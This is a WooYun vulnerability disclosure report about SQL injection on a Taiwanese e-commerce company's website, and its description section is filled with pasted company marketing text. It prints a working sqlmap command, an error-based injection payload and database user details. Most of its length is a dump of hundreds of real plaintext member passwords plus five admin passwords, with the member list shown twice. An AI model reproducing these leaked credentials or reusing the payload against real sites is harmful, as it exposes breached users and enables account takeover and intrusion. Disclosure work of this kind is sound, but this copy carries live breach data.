安翌全球網路股份有限公司主站存在SQL注射漏洞（大量用户明文密码泄露）（臺灣地區）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0157755

漏洞标题：安翌全球網路股份有限公司主站存在SQL注射漏洞（大量用户明文密码泄露）（臺灣地區）

漏洞作者：路人甲

提交时间：2015-12-03 11:37

修复时间：2016-01-19 20:10

公开时间：2016-01-19 20:10

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-12-03：细节已通知厂商并且等待厂商处理中
2015-12-05：厂商已经确认，细节仅向厂商公开
2015-12-15：细节向核心白帽子及相关领域专家公开
2015-12-25：细节向普通白帽子公开
2016-01-04：细节向实习白帽子公开
2016-01-19：细节向公众公开

简要描述：

每一個初次接觸到安翌全球的新朋友，都會對這個名不見經傳的網路公司感到好奇，奇怪的是阿里巴巴集團旗下的淘寶天貓商城，為什麼會發一張正式的招商授權書給安翌全球？
天貓不能、不會自已招商嗎？
阿里巴巴不是有子公司在台灣嗎？
騙人的吧！我們怎麼從來都沒聽說過。

甚至很多集團直接說我們跟馬云很熟！
去年我們去許多金控公司跟他們談支付寶，去許多上市公司跟他們談天貓商城，談馬云的企圖心及事業版圖。
什麼是平台，除了B2B,C2C,B2C,什麼是C2B?
金融方面除了存放款，第三方支付外，還有什麼是未來趨勢？移動支持，線上與線下購物及支付的關係，新載體會是什麼樣子？
將來的商業模式及金融體系會如何變化？
我們感受到了大家的急迫感和壓力！！
台灣商場流行一句話：『在台灣等死，去大陸找死，等死要本錢，找死要本事，等死一定死，找死卻不一定死。』大家都看到大陸市場的商機，同時也了解市場的不確定性及風險，如何去才能避開風險？
大集團有大集團的計劃，中小企業卻有不得不去的壓力，該找誰諮詢？我們常被問到的都是三證怎麼辦？要多久？多少錢？

而我們想理解的是我們的廠商真的準備好了嗎？
今年我們的策略是整合幾個大商家，由他們帶領我們許多的中小型廠商一起去經營大陸市場。
在這麼多年輔導廠商建立電子商務的經驗中，我們已經做到虛實整合、跨國經營，這也是阿里巴巴集團及淘寶天貓商城委託我們招商的主因，全世界最大的電子商務交易平台他們已經做好了，連帶著整個中國的實體經銷體系也早就會利用這個平台找商品。

你們還在單打獨鬥嗎？
安翌全球不只是電子商務，已經是一個虛實整合、資源整合的公司，我們所提供的諮詢及通路，能讓你們在中國、在東協（盟）生意興隆！

详细说明：

地址：http://**.**.**.**/service_info.php?item=aegogo

$ python sqlmap.py -u "http://**.**.**.**/service_info.php?item=aegogo" -p item --technique=E --random-agent --batch  --no-cast --current-user --is-dba --users --passwords --count --search -C pass --output-dir=output

Database: AE_aeweb
Table: MemberAcc
[838 entries]
+------------------+
| password         |
+------------------+
| 00000215         |
| 000006           |
| 000009           |
| 000vv000         |
| 001114001114     |
| 003278           |
| 00640613         |
| 01117878         |
| 0205cool         |
| 02468            |
| 03723271         |
| 0421pk           |
| 0510             |
| 051605           |
| 0521             |
| 062794732        |
| 063362415        |
| 0803pipi         |
| 08150815         |
| 08300626         |
| 09030525         |
| 0912443992       |
| 0913355675       |
| 0918129571       |
| 0919770688       |
| 0921703675       |
| 0923984777       |
| 0925303373       |
| 0926099 32       |
| 0926259235       |
| 0926739837       |
| 0926771879       |
| 0935513367       |
| 0935540048       |
| 0936829902       |
| 0939137000       |
| 0939284071       |
| 0939284071       |
| 0953690600       |
| 097dpG7z80N1Xg3s |
| 0980315753       |
| 0985480362       |
| 0986943649       |
| 0c2C6YM6x8LjbRsA |
| 100001           |
| 10240910         |
| 102889           |
| 1032383321       |
| 11041224         |
| 1111             |
| 1111             |
| 111111           |
| 111111           |
| 11111111         |
| 11111111         |
| 11111111         |
| 11111111         |
| 111111111        |
| 112300           |
| 11231123         |
| 11231123         |
| 11231123         |
| 1139             |
| 118046           |
| 12061103         |
| 1207             |
| 12116131         |
| 12116131         |
| 122249629        |
| 12228520         |
| 122416           |
| 122416           |
| 1228zheng        |
| 123000           |
| 123123           |
| 1234             |
| 1234             |
| 1234             |
| 1234             |
| 12345            |
| 12345            |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 12345678         |
| 12345678         |
| 12345678         |
| 12345678         |
| 12345678         |
| 12345678         |
| 12345678         |
| 12345678         |
| 12345678         |
| 12345678         |
| 12345678         |
| 12345678         |
| 12345678         |
| 12345678         |
| 12345678         |
| 12345678         |
| 12345678         |
| 12345678         |
| 12345678         |
| 12345678         |
| 12345678         |
| 12345678         |
| 12345678         |
| 123456789        |
| 123456789~1      |
| 123456qq         |
| 123456qq         |
| 123gogogo        |
| 131420           |
| 1314520fy        |
| 1377757239       |
| 13941394         |
| 14105030a        |
| 150588           |
| 15776753         |
| 159753           |
| 1638             |
| 19571101         |
| 19610219         |
| 19650505         |
| 19700803         |
| 19770207         |
| 197905251        |
| 19790729         |
| 1980525          |
| 19810615         |
| 19821022         |
| 19830811         |
| 19831217         |
| 1986328          |
| 19880626         |
| 19880906         |
| 198865           |
| 19980809         |
| 1q2w3e4r         |
| 1qasde32w        |
| 1qaz2wsx         |
| 1qaz2wsx         |
| 1qazxsw@         |
| 200068734        |
| 20020215         |
| 20020921         |
| 20061007         |
| 200683           |
| 20080429         |
| 20090401         |
| 20091688         |
| 20101234         |
| 20111218         |
| 20120601         |
| 20cch7060258     |
| 220133           |
| 23195637         |
| 23207981         |
| 23705137         |
| 23979537         |
| 23979539         |
| 2423500          |
| 2423500          |
| 24839857         |
| 25469181         |
| 255496           |
| 258803           |
| 26276381         |
| 26364878         |
| 269019           |
| 26998612         |
| 270669           |
| 27673916         |
| 27892139         |
| 27954155         |
| 2810520          |
| 282726           |
| 28307656         |
| 29001466         |
| 29061675         |
| 2axijoll         |
| 2glioari         |
| 2gxiidll         |
| 2irxaaix         |
| 3028270          |
| 3028470          |
| 303713           |
| 3069za           |
| 308094           |
| 31222222         |
| 3161025470       |
| 3223988          |
| 3315761          |
| 33205687         |
| 3388vil955       |
| 3572097          |
| 3745             |
| 3828668          |
| 3c3233iw2727     |
| 440404           |
| 441012           |
| 4669110          |
| 4775117          |
| 4815358          |
| 49416792         |
| 494cl4           |
| 49836219         |
| 4rsd10447Is36vg8 |
| 50105s           |
| 5079326          |
| 51rWn5hG32ofQ2G3 |
| 5200914          |
| 5201314          |
| 5201314          |
| 520208           |
| 520999999        |
| 52275227         |
| 5235661          |
| 5252bb           |
| 52989797         |
| 5318420317       |
| 53750966         |
| 5377880          |
| 540088           |
| 5477             |
| 55080833         |
| 5518OO           |
| 5544327abc       |
| 5554bc5b4c       |
| 55985598         |
| 579667           |
| 581221           |
| 5841314520       |
| 590210           |
| 590425           |
| 591127           |
| 5c6678           |
| 631014           |
| 63326332         |
| 641119           |
| 641222           |
| 660926           |
| 661110           |
| 6649jky          |
| 66KGA44jQ6if9xja |
| 670905           |
| 67720845         |
| 67soap88         |
| 680937231065     |
| 681105           |
| 68740227         |
| 688888           |
| 68915            |
| 690525969        |
| 690996587        |
| 691124           |
| 6ppEWwXF92351Q7Q |
| 700117           |
| 700118           |
| 700305           |
| 700425           |
| 700714           |
| 70082            |
| 70837679         |
| 70b96e2b9Fcep31T |
| 7110             |
| 7171528          |
| 7215201314       |
| 73911150         |
| 740604           |
| 741119           |
| 750827_momo      |
| 7568443          |
| 760316           |
| 760402           |
| 760414           |
| 761229_ly        |
| 7650405          |
| 775034           |
| 7777             |
| 77777777         |
| 7830158          |
| 787878           |
| 789789           |
| 7919912220       |
| 7933983          |
| 7933983          |
| 79504628boz      |
| 7J1eqGreU11J9o0p |
| 8012010          |
| 80195715         |
| 8020             |
| 80666739         |
| 80720115         |
| 810615           |
| 813724uly        |
| 81iv120          |
| 82732526         |
| 830219ucla       |
| 83138313         |
| 83138313         |
| 83163860@        |
| 850729           |
| 85757811         |
| 860130           |
| 8641246          |
| 87654321         |
| 880501ul         |
| 880811           |
| 881072           |
| 888666919        |
| 888888           |
| 888888           |
| 88888889         |
| 88889999         |
| 88dc236e         |
| 890463           |
| 89252843         |
| 89568956         |
| 898989888        |
| 9011115040       |
| 901r2bwpn        |
| 907922           |
| 9088             |
| 911911           |
| 9271qm           |
| 927525           |
| 928928928        |
| 937350608        |
| 95307244         |
| 96909536         |
| 96909536         |
| 9708111011       |
| 97562149         |
| 980503chingji    |
| 981222ethh       |
| 9897965          |
| 991114           |
| 9ryn81uc1czlB8jb |
| A02678910        |
| a0930531091      |
| a0935740155      |
| a0955013152      |
| A0982457251      |
| a0989288233      |
| a0989988699      |
| A12345           |
| a128003975       |
| a192837          |
| a198279          |
| a19851030        |
| a20080201        |
| a20271072        |
| a2352366         |
| a26906061        |
| a29000065        |
| a29061675        |
| a3885597         |
| A3XLcOEQe0Cqe1R0 |
| a5200121         |
| a588a58828       |
| a630831          |
| a7788563         |
| a801929          |
| a89828855        |
| a9265630         |
| aa0623aa         |
| aa1202           |
| aa1234           |
| aa45989          |
| aa520999         |
| aa555050         |
| aa880412         |
| aa92277612       |
| AAA001869        |
| aaa2351677       |
| aaabbb222        |
| aabbcc0720       |
| aabbcc0720       |
| aagr8126         |
| aaiatao990       |
| ab086            |
| ab1368           |
| ab3qbh580407     |
| ab4600           |
| abc123           |
| abc441104        |
| abc661115        |
| ac123            |
| acc260177        |
| acu2121@@@       |
| ad620312         |
| adonis           |
| aeqazxsw         |
| aestore5678      |
| aestoretest      |
| aeweb123         |
| ahting33         |
| alex0405         |
| aluz1219         |
| amber72527       |
| amy560314        |
| anfernee0731     |
| ani720616        |
| april0426        |
| aq123456         |
| aq123456         |
| asd01341         |
| asd811130        |
| Ava89822358      |
| axsz4687925      |
| az888789         |
| b0930514523      |
| b167i7o8j5687a   |
| b167i7o8j5687a   |
| b22156           |
| b451ul3791516    |
| babee3917        |
| babo1234         |
| babo1234         |
| back0828         |
| bai13068455502   |
| bala77           |
| bb3152006        |
| bear620613       |
| bee214           |
| betty19890910    |
| bird1616         |
| bitdai11         |
| BOBO19851020     |
| BOBO19851020     |
| c620219510115    |
| candy1218        |
| cannon37         |
| cc08li19         |
| cccc531015       |
| Ccl6NZGo8A5yGj9K |
| ccw547382        |
| ccya28430216     |
| cek021           |
| ch200508         |
| chang0921560345  |
| changemyself     |
| chaochao         |
| chen123          |
| chensing0904     |
| chi19837221      |
| chienwhe         |
| chinese99103!!   |
| chinlaun         |
| cica             |
| cici0130         |
| cig12345         |
| ck53rd32643      |
| ckj1205          |
| colu123med       |
| cool8888         |
| cuosbaby         |
| cv123            |
| cXs78oS4WyAVV2mD |
| cy9979           |
| d25522552        |
| d79898           |
| d972972          |
| davidorz0        |
| dd388312         |
| dickdick         |
| dicky691119      |
| digi9434         |
| dn521817         |
| dong2249         |
| dora580808       |
| dt01031011       |
| e001542          |
| e00655713        |
| e19851020        |
| e2345678         |
| e571234          |
| e571234          |
| e998123232       |
| eau6160          |
| edward12539      |
| edwgsl16         |
| enoch!lee        |
| Enoch@2009       |
| erich3411        |
| ethan881         |
| EUNICCE26        |
| eva790718        |
| eyes218530       |
| f14789632        |
| fairy5891        |
| fD76DDSN71AxIXb4 |
| felicia2005      |
| fld141319        |
| frank0604        |
| freegi54         |
| friends          |
| fsdfdsfa         |
| fu0815           |
| fuckyou          |
| funshop          |
| g4jp60503        |
| gapple12         |
| gds701019        |
| gigi1121         |
| gigi1121         |
| gn00028069       |
| gn01883507       |
| gnweghhhf5368    |
| good669447       |
| good8888         |
| gpq6ap37         |
| gt56yhnb         |
| guy57lily@       |
| gw0811           |
| h201869585       |
| han5i011         |
| hank0305         |
| hank962327       |
| hanming1985125   |
| hbl530205        |
| hc016895         |
| heihudie         |
| hjf5028          |
| hn6688           |
| horace           |
| hphp152          |
| hua13064415462   |
| hung66778899     |
| hungshing        |
| i5201314         |
| ibmx60           |
| iii7675          |
| ilifeilife       |
| iloveali0904     |
| iou1223          |
| ivan1207         |
| j12345           |
| j1j2j3j4         |
| j581102          |
| j771024          |
| j771024          |
| j771024          |
| j775721          |
| jack51315088     |
| jd0326           |
| ji31j6ul4xk7     |
| ji394su3         |
| jin801018        |
| jj8182730        |
| jjbojjbo         |
| joejoebaby520    |
| joewyn780707     |
| john497          |
| Js1254           |
| js9523jc         |
| ju1206           |
| ju4421zr         |
| juju555          |
| juryside         |
| k04880520        |
| K08130426        |
| k575557          |
| k6917865         |
| k88888           |
| karen219         |
| kate123          |
| kate123          |
| kate1234         |
| kateaestore      |
| katty1223        |
| kelly8n3706      |
| kenko409         |
| kevin128         |
| KIKILUkikilu2000 |
| kira0204         |
| kiss0616         |
| kitty70828       |
| kk123456         |
| kk1329           |
| kk7891           |
| kkjj5858         |
| kkshop6820561fd  |
| l124660268       |
| l19751002        |
| l222725231       |
| l25222068        |
| l4SrmUD700qlF2U8 |
| l8JIXFwjMW2ll35Z |
| lau88128812      |
| leatherpam       |
| lee5201314       |
| leeahpin801215   |
| leeahpin801215   |
| lgfm3bxjs5       |
| li1312           |
| li13121312       |
| limkok93         |
| lin08061108123   |
| linda666         |
| ljmljxljmljx     |
| LNSTLS2012       |
| lojane224823     |
| longmen2020      |
| lonjohn88        |
| lori@vernice     |
| love0315         |
| love0518         |
| love0620         |
| love131          |
| love5213         |
| love521689       |
| lovekiss         |
| low15471003      |
| lv801129         |
| lyj521125        |
| m08150815        |
| m10188           |
| m134679m         |
| M2209749         |
| macgyver         |
| machi8_1         |
| maggie4628       |
| mandy5439        |
| marc941676       |
| maureen16        |
| may1322          |
| mermaid          |
| meya188          |
| mfkxwy88         |
| mico005161       |
| mikimiki         |
| milch            |
| mill0987         |
| milla9           |
| millet26         |
| milly123         |
| mimi0702         |
| min0039          |
| missyou820407    |
| mnb1984          |
| mnbv             |
| mnbvmnbv         |
| monamona         |
| money1234        |
| moon800210       |
| moorechou        |
| mpp588           |
| ms12070331       |
| mya358           |
| n5103111         |
| ness4823         |
| new123           |
| ng085534         |
| nichemoto        |
| nickjames168     |
| npdwncof2        |
| o2modamarketing  |
| one0718          |
| p5845828         |
| pat30806         |
| pay1314520       |
| pc690120         |
| peggy1217        |
| pig0601          |
| pig988978        |
| polin6688        |
| pP730507         |
| psy5936078       |
| q0418            |
| q121212          |
| q22042204        |
| q9213011         |
| qaz0976155018    |
| qaz0980066066    |
| qaz1793          |
| qaz510551        |
| qazz570129       |
| qooabc741        |
| qoqoqo78         |
| qq661238         |
| qqaazz1204       |
| qqqq1111         |
| qsc1116          |
| qshmmlp78123     |
| qw321123         |
| qwe25262         |
| qwe3040502       |
| qwerty7993042    |
| qwertyuiop30     |
| r0938327607      |
| r1228362         |
| relclage         |
| rex1111          |
| rex888           |
| rMxzwLlaXgavIY0w |
| roger            |
| rorirori0205     |
| s0027745         |
| s0982006981      |
| S9162634         |
| SAM690222        |
| samycf           |
| sasasa           |
| sasasa           |
| seed911          |
| she9149          |
| sherry123        |
| sherrywang       |
| SHINE520         |
| simon1975        |
| sol661106        |
| star8586         |
| steelgoat575     |
| su3g4su3         |
| su5251           |
| super2008        |
| sweet411020      |
| sweet99168888    |
| sweet99168888    |
| t0919881235      |
| t0919881235      |
| t123456          |
| t3272649         |
| ta0730           |
| taitea650719     |
| tale910          |
| talent           |
| tanaka           |
| tcchma0725       |
| tea961687        |
| thjvomn7452      |
| thx123123        |
| tim350           |
| ting47032        |
| tiong123         |
| tk5510343        |
| tmnet123         |
| tontas888        |
| toto8888         |
| tov670829        |
| tsai2511         |
| Ttap0q93rebg3qIZ |
| tw2357738        |
| tynn19910526     |
| u123456          |
| U7M1UJ041w5I93n5 |
| u83mp6           |
| uglyboyman       |
| ukYbf9g8tPKHzvgk |
| V099999          |
| v2619033         |
| vanilla5417      |
| view187aim577    |
| vina8888         |
| vipkhzx001122    |
| vivi5596         |
| vivi680910       |
| w6285578         |
| w7234112         |
| w880412          |
| waimun1981       |
| wally80024       |
| wangqian520      |
| wc6324           |
| wcp9319          |
| wenha0213        |
| william17        |
| win2258          |
| winweien         |
| wlc13812176567   |
| wpHMS2455        |
| wps0106          |
| www520           |
| www520           |
| wyyaini          |
| x71123           |
| xgc2324          |
| xhVSU9VTBLw6W66c |
| xiaomao          |
| xiaoxiang        |
| xo19850225       |
| xy5538           |
| y026689012       |
| y12055           |
| y27781982        |
| yD19Cj4G6zkfk4Q9 |
| yesokay0912      |
| yhpuio371363636  |
| yjo494g4su3      |
| young2828        |
| yu27185555*      |
| yukachris        |
| yung1211         |
| z0147896325      |
| z19871120        |
| z2243856         |
| z22887149Z       |
| ziyou19731014    |
| zr19761217       |
| zx!@CV34         |
| zx690328         |
| zxc6820613       |
| zxc930323        |
| zxcvasdf         |
| zxcvb            |
| zzz888           |
+------------------+
Database: AE_aeweb
Table: AdminLogin
[5 entries]
+-------------+
| password    |
+-------------+
| 38391018    |
| answer12345 |
| answer1357  |
| lg456789    |
| su3g4su3    |
+-------------+

漏洞证明：

---
Parameter: item (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: item=aegogo' AND (SELECT 8128 FROM(SELECT COUNT(*),CONCAT(0x7171787671,(SELECT (ELT(8128=8128,1))),0x7176706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xzeD'='xzeD
---
web application technology: PHP 5.3.3, Apache
back-end DBMS: MySQL 5.0
current user:    'AewEBOfficial032@%'
current user is DBA:    False
database management system users [1]:
[*] 'AewEBOfficial032'@'%'
Database: AE_aeweb
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| MemberAcc                             | 838     |
| DealerSurvey                          | 295     |
| OdData                                | 245     |
| OdMain                                | 175     |
| News                                  | 162     |
| Contact                               | 154     |
| Product                               | 119     |
| Service                               | 86      |
| Qa                                    | 81      |
| Questionary                           | 76      |
| Customer                              | 71      |
| `aeweb.cvs`                           | 69      |
| WebsiteData                           | 67      |
| Success                               | 29      |
| ProductClass                          | 28      |
| ServiceClass                          | 21      |
| PayNotice                             | 20      |
| ProGroup                              | 20      |
| QaClass                               | 18      |
| Download                              | 14      |
| About                                 | 13      |
| ItemSet                               | 13      |
| AdArea                                | 12      |
| ApplyData                             | 9       |
| WebAD                                 | 9       |
| SuccessClass                          | 7       |
| BingTang                              | 6       |
| Partner                               | 6       |
| AdminLogin                            | 5       |
| Payment                               | 4       |
| DownloadClass                         | 3       |
| LangSys                               | 3       |
| LangUser                              | 3       |
| WebStyle                              | 3       |
| AboutClass                            | 2       |
| ContactText                           | 2       |
| PartnerClass                          | 2       |
| PayNoticeText                         | 2       |
| PicSize                               | 2       |
| Team                                  | 2       |
| AegogoReg_text                        | 1       |
| MemberText                            | 1       |
| NewsClass                             | 1       |
| Privacy                               | 1       |
| SysSn                                 | 1       |
| SysVersion                            | 1       |
| WebData                               | 1       |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 1262    |
| SESSION_VARIABLES                     | 513     |
| GLOBAL_VARIABLES                      | 496     |
| GLOBAL_STATUS                         | 443     |
| SESSION_STATUS                        | 443     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 229     |
| COLLATIONS                            | 229     |
| PARTITIONS                            | 121     |
| TABLES                                | 121     |
| ALL_PLUGINS                           | 101     |
| KEY_COLUMN_USAGE                      | 56      |
| STATISTICS                            | 56      |
| TABLE_CONSTRAINTS                     | 56      |
| PLUGINS                               | 47      |
| CHARACTER_SETS                        | 40      |
| INNODB_FT_DEFAULT_STOPWORD            | 36      |
| ENGINES                               | 10      |
| SCHEMA_PRIVILEGES                     | 4       |
| SCHEMATA                              | 2       |
| ENABLED_ROLES                         | 1       |
| KEY_CACHES                            | 1       |
| PROCESSLIST                           | 1       |
| USER_PRIVILEGES                       | 1       |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: AE_aeweb
Table: MemberAcc
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(16) |
+----------+-------------+
Database: AE_aeweb
Table: AdminLogin
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(16) |
+----------+-------------+
Database: AE_aeweb
Table: MemberAcc
[838 entries]
+------------------+
| password         |
+------------------+
| 00000215         |
| 000006           |
| 000009           |
| 000vv000         |
| 001114001114     |
| 003278           |
| 00640613         |
| 01117878         |
| 0205cool         |
| 02468            |
| 03723271         |
| 0421pk           |
| 0510             |
| 051605           |
| 0521             |
| 062794732        |
| 063362415        |
| 0803pipi         |
| 08150815         |
| 08300626         |
| 09030525         |
| 0912443992       |
| 0913355675       |
| 0918129571       |
| 0919770688       |
| 0921703675       |
| 0923984777       |
| 0925303373       |
| 0926099 32       |
| 0926259235       |
| 0926739837       |
| 0926771879       |
| 0935513367       |
| 0935540048       |
| 0936829902       |
| 0939137000       |
| 0939284071       |
| 0939284071       |
| 0953690600       |
| 097dpG7z80N1Xg3s |
| 0980315753       |
| 0985480362       |
| 0986943649       |
| 0c2C6YM6x8LjbRsA |
| 100001           |
| 10240910         |
| 102889           |
| 1032383321       |
| 11041224         |
| 1111             |
| 1111             |
| 111111           |
| 111111           |
| 11111111         |
| 11111111         |
| 11111111         |
| 11111111         |
| 111111111        |
| 112300           |
| 11231123         |
| 11231123         |
| 11231123         |
| 1139             |
| 118046           |
| 12061103         |
| 1207             |
| 12116131         |
| 12116131         |
| 122249629        |
| 12228520         |
| 122416           |
| 122416           |
| 1228zheng        |
| 123000           |
| 123123           |
| 1234             |
| 1234             |
| 1234             |
| 1234             |
| 12345            |
| 12345            |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 123456           |
| 12345678         |
| 12345678         |
| 12345678         |
| 12345678         |
| 12345678         |
| 12345678         |
| 12345678         |
| 12345678         |
| 12345678         |
| 12345678         |
| 12345678         |
| 12345678         |
| 12345678         |
| 12345678         |
| 12345678         |
| 12345678         |
| 12345678         |
| 12345678         |
| 12345678         |
| 12345678         |
| 12345678         |
| 12345678         |
| 12345678         |
| 123456789        |
| 123456789~1      |
| 123456qq         |
| 123456qq         |
| 123gogogo        |
| 131420           |
| 1314520fy        |
| 1377757239       |
| 13941394         |
| 14105030a        |
| 150588           |
| 15776753         |
| 159753           |
| 1638             |
| 19571101         |
| 19610219         |
| 19650505         |
| 19700803         |
| 19770207         |
| 197905251        |
| 19790729         |
| 1980525          |
| 19810615         |
| 19821022         |
| 19830811         |
| 19831217         |
| 1986328          |
| 19880626         |
| 19880906         |
| 198865           |
| 19980809         |
| 1q2w3e4r         |
| 1qasde32w        |
| 1qaz2wsx         |
| 1qaz2wsx         |
| 1qazxsw@         |
| 200068734        |
| 20020215         |
| 20020921         |
| 20061007         |
| 200683           |
| 20080429         |
| 20090401         |
| 20091688         |
| 20101234         |
| 20111218         |
| 20120601         |
| 20cch7060258     |
| 220133           |
| 23195637         |
| 23207981         |
| 23705137         |
| 23979537         |
| 23979539         |
| 2423500          |
| 2423500          |
| 24839857         |
| 25469181         |
| 255496           |
| 258803           |
| 26276381         |
| 26364878         |
| 269019           |
| 26998612         |
| 270669           |
| 27673916         |
| 27892139         |
| 27954155         |
| 2810520          |
| 282726           |
| 28307656         |
| 29001466         |
| 29061675         |
| 2axijoll         |
| 2glioari         |
| 2gxiidll         |
| 2irxaaix         |
| 3028270          |
| 3028470          |
| 303713           |
| 3069za           |
| 308094           |
| 31222222         |
| 3161025470       |
| 3223988          |
| 3315761          |
| 33205687         |
| 3388vil955       |
| 3572097          |
| 3745             |
| 3828668          |
| 3c3233iw2727     |
| 440404           |
| 441012           |
| 4669110          |
| 4775117          |
| 4815358          |
| 49416792         |
| 494cl4           |
| 49836219         |
| 4rsd10447Is36vg8 |
| 50105s           |
| 5079326          |
| 51rWn5hG32ofQ2G3 |
| 5200914          |
| 5201314          |
| 5201314          |
| 520208           |
| 520999999        |
| 52275227         |
| 5235661          |
| 5252bb           |
| 52989797         |
| 5318420317       |
| 53750966         |
| 5377880          |
| 540088           |
| 5477             |
| 55080833         |
| 5518OO           |
| 5544327abc       |
| 5554bc5b4c       |
| 55985598         |
| 579667           |
| 581221           |
| 5841314520       |
| 590210           |
| 590425           |
| 591127           |
| 5c6678           |
| 631014           |
| 63326332         |
| 641119           |
| 641222           |
| 660926           |
| 661110           |
| 6649jky          |
| 66KGA44jQ6if9xja |
| 670905           |
| 67720845         |
| 67soap88         |
| 680937231065     |
| 681105           |
| 68740227         |
| 688888           |
| 68915            |
| 690525969        |
| 690996587        |
| 691124           |
| 6ppEWwXF92351Q7Q |
| 700117           |
| 700118           |
| 700305           |
| 700425           |
| 700714           |
| 70082            |
| 70837679         |
| 70b96e2b9Fcep31T |
| 7110             |
| 7171528          |
| 7215201314       |
| 73911150         |
| 740604           |
| 741119           |
| 750827_momo      |
| 7568443          |
| 760316           |
| 760402           |
| 760414           |
| 761229_ly        |
| 7650405          |
| 775034           |
| 7777             |
| 77777777         |
| 7830158          |
| 787878           |
| 789789           |
| 7919912220       |
| 7933983          |
| 7933983          |
| 79504628boz      |
| 7J1eqGreU11J9o0p |
| 8012010          |
| 80195715         |
| 8020             |
| 80666739         |
| 80720115         |
| 810615           |
| 813724uly        |
| 81iv120          |
| 82732526         |
| 830219ucla       |
| 83138313         |
| 83138313         |
| 83163860@        |
| 850729           |
| 85757811         |
| 860130           |
| 8641246          |
| 87654321         |
| 880501ul         |
| 880811           |
| 881072           |
| 888666919        |
| 888888           |
| 888888           |
| 88888889         |
| 88889999         |
| 88dc236e         |
| 890463           |
| 89252843         |
| 89568956         |
| 898989888        |
| 9011115040       |
| 901r2bwpn        |
| 907922           |
| 9088             |
| 911911           |
| 9271qm           |
| 927525           |
| 928928928        |
| 937350608        |
| 95307244         |
| 96909536         |
| 96909536         |
| 9708111011       |
| 97562149         |
| 980503chingji    |
| 981222ethh       |
| 9897965          |
| 991114           |
| 9ryn81uc1czlB8jb |
| A02678910        |
| a0930531091      |
| a0935740155      |
| a0955013152      |
| A0982457251      |
| a0989288233      |
| a0989988699      |
| A12345           |
| a128003975       |
| a192837          |
| a198279          |
| a19851030        |
| a20080201        |
| a20271072        |
| a2352366         |
| a26906061        |
| a29000065        |
| a29061675        |
| a3885597         |
| A3XLcOEQe0Cqe1R0 |
| a5200121         |
| a588a58828       |
| a630831          |
| a7788563         |
| a801929          |
| a89828855        |
| a9265630         |
| aa0623aa         |
| aa1202           |
| aa1234           |
| aa45989          |
| aa520999         |
| aa555050         |
| aa880412         |
| aa92277612       |
| AAA001869        |
| aaa2351677       |
| aaabbb222        |
| aabbcc0720       |
| aabbcc0720       |
| aagr8126         |
| aaiatao990       |
| ab086            |
| ab1368           |
| ab3qbh580407     |
| ab4600           |
| abc123           |
| abc441104        |
| abc661115        |
| ac123            |
| acc260177        |
| acu2121@@@       |
| ad620312         |
| adonis           |
| aeqazxsw         |
| aestore5678      |
| aestoretest      |
| aeweb123         |
| ahting33         |
| alex0405         |
| aluz1219         |
| amber72527       |
| amy560314        |
| anfernee0731     |
| ani720616        |
| april0426        |
| aq123456         |
| aq123456         |
| asd01341         |
| asd811130        |
| Ava89822358      |
| axsz4687925      |
| az888789         |
| b0930514523      |
| b167i7o8j5687a   |
| b167i7o8j5687a   |
| b22156           |
| b451ul3791516    |
| babee3917        |
| babo1234         |
| babo1234         |
| back0828         |
| bai13068455502   |
| bala77           |
| bb3152006        |
| bear620613       |
| bee214           |
| betty19890910    |
| bird1616         |
| bitdai11         |
| BOBO19851020     |
| BOBO19851020     |
| c620219510115    |
| candy1218        |
| cannon37         |
| cc08li19         |
| cccc531015       |
| Ccl6NZGo8A5yGj9K |
| ccw547382        |
| ccya28430216     |
| cek021           |
| ch200508         |
| chang0921560345  |
| changemyself     |
| chaochao         |
| chen123          |
| chensing0904     |
| chi19837221      |
| chienwhe         |
| chinese99103!!   |
| chinlaun         |
| cica             |
| cici0130         |
| cig12345         |
| ck53rd32643      |
| ckj1205          |
| colu123med       |
| cool8888         |
| cuosbaby         |
| cv123            |
| cXs78oS4WyAVV2mD |
| cy9979           |
| d25522552        |
| d79898           |
| d972972          |
| davidorz0        |
| dd388312         |
| dickdick         |
| dicky691119      |
| digi9434         |
| dn521817         |
| dong2249         |
| dora580808       |
| dt01031011       |
| e001542          |
| e00655713        |
| e19851020        |
| e2345678         |
| e571234          |
| e571234          |
| e998123232       |
| eau6160          |
| edward12539      |
| edwgsl16         |
| enoch!lee        |
| Enoch@2009       |
| erich3411        |
| ethan881         |
| EUNICCE26        |
| eva790718        |
| eyes218530       |
| f14789632        |
| fairy5891        |
| fD76DDSN71AxIXb4 |
| felicia2005      |
| fld141319        |
| frank0604        |
| freegi54         |
| friends          |
| fsdfdsfa         |
| fu0815           |
| fuckyou          |
| funshop          |
| g4jp60503        |
| gapple12         |
| gds701019        |
